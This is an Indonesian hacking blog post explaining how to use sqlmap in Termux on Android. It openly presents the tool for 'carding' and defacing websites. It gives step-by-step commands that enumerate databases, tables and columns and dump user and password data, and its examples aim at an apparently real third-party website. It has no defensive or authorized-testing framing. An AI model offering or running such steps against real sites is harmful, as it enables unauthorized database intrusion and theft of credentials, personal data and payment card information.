Kamis, 04 April 2019

Cara Menggunakan SQLMap di Termux

cara menggunakan sqlmap di termux

Cara menggunakan sqlmap di Termux - SqlMap merupakan sebuah tool opensource yang dapat di gunakan untuk menguji dan mengekspoitasi kerentanan pada SQL Injection, dengan menggunakan sqlmap seseorang dapat melakukan serangan sqlinjection sehingga bisa masuk ke dalam server maupun database sebuah web site.

sqlmap juga merupakan sebuah tool yang sangat populer di kalangan para pentester, mereka bisanya menggunakan sqlmap  untuk melakukan deface maupun carding dengan sengaja masuk ke database website dan mencari informasi pribadi seperti Ceditcard (CC) atau Acc.

Baca Juga : Cara Menemukan Web Vuln dengan Gr3nox

Sqlmap umumnya di jalankan di sistem operasi linux tapi buat kalian yang tidak punya pc atau laptop kalian juga masih tetap bisa menggunakan sqlmap menggunakan android melalui aplikasi bantuan yaitu termux. dengan begitu kalian bisa menggunakan sqlmap dengan praktis.

di postingan kali ini saya akan memberikan tutorial cara menggunakan sqlmap di termux tapi pastikan terlebih dahulu  kalian sudah menginstall sqlmapnya di android, jika belum kalian bisa melihat tutorial menginstall sqlmap di sini, baiklah sekarang kita lanjut ke cara penggunaanya.

Cara Mengunakan SQLMap untuk Carding


1. langkah pertama kalian siapkan terebih dahulu target website yang sudah vuln, jka kalian belum punya kalian bisa mencarinya dengan menggunakan grenox yang sudah saya bahas di postingan sebelumnya.

2. jalankan sqlmap yang sudah terinstal di termux kalian menggunakan sintaks

$ python2 sqlmap.py --url (target web vuln) --dbs

cara install sqlmap di termux

misal seperti saya $python2 sqlmap.py --url http://www.antkh.com/project/kfour/Products.php?CatID=12 --dbs lalu enter untuk meinjecksi databasenya.

3. tunggu hingga prosesnya berjalan sampai selesai, nanti akan keluar informasi yang ada di database target, di bawah

carding lewat sqlmap termux

saya sudah mendapatkan informasi mengenai databasenya yaitu antkhproject dan juga yang pasti information_schema, saya akan mengeksploitasi antkhproject untuk mendapatkan informasi table.

untuk melakukanya kalian gunakan sintaks

$ python2 sqlmap.py --url (target web vuln) --dbs (database yang sudah di dapat) --tables

misalkan saya $python2 sqlmap.py --url http://www.antkh.com/project/kfour/Products.php?CatID=12 --dbs antkhproject --tables nanti akan kluar table - table yang ada di databse antkhproject.

4. cari lah table yang menyimpan informasi mengenai admin maupun user, kemudian get colloumns, menggunakan sintaks

$ python2 sqlmap.py --url (target web vuln) --dbs (database yang sudah di dapat) --tables (nama tabel) --columns

cara deface dengan sqlmap di termux

5. nanti akan keluar banyak sekali colom, carilah colom yang sekiranya menyompan informasi penting seperti user maupun password, kemudian dumping datanya dengan sintaks

$ python2 sqlmap.py --url (target web vuln) --dbs (database yang sudah di dapat) --tables (nama tabel) --columns (nama colom)--dump

sqlmap termux android

nanti akan keluar data dari columns yang kalian pilih tapi biasnya untuk password masih berbentuk hash atau terencrypt untuk melihat jenis encrypt silahkan kalian cek di ecrypt checker.

demikian tutorial tentang cara menggunakan sqlmap di termux semoga bermanfaat dan sampai jumpa di postingan berikutnya.

Terima Kasih Telah mengunjungi Blog FHXploit Bantu kami mengembangkan Channel Youtube dengan Subscribe di Channel FHXploit. Dan Jangan lupa terus kunjungi www.fhxploit.Com untuk melihat Artikel lainnya.
Klik Untuk BerKomentar

0 komentar

Paling Populer

Entri yang Diunggulkan

3 Cara Merubah Tampilan Terminal Linux Lengkap

selamat datang kembali sobat bazengers di blog FHXploit! di postingan kali ini saya akan kembali untuk membawakan tutorial seputar linux...